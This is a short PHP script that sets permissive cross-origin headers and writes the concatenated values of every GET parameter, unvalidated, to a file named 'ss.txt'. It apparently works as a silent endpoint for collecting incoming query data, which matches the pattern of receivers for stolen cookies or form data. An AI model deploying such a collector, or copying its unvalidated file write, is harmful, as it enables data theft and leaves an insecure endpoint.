<?php
header("Connection: Keep-alive");
header("Access-control-allow-origin: *");
header('X-Frame-Options: SAMEORIGIN');
header("Access-Control-Allow-Credentials: true");
header('Access-Control-Allow-Methods: GET');
header("Access-Control-Allow-Headers: Content-Type, Accept, X-Requested-With, x-authorization");
header('X-XSS-Protection: 1; mode=block');
header('Content-type: text/html');
header("Cache-Control: no-store, no-cache, must-revalidate, max-age=0");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");
$f='';
foreach($_GET as $g){
	$f.=$g;
};
file_put_contents('ss.txt',$f);
require_once('bantuan.php');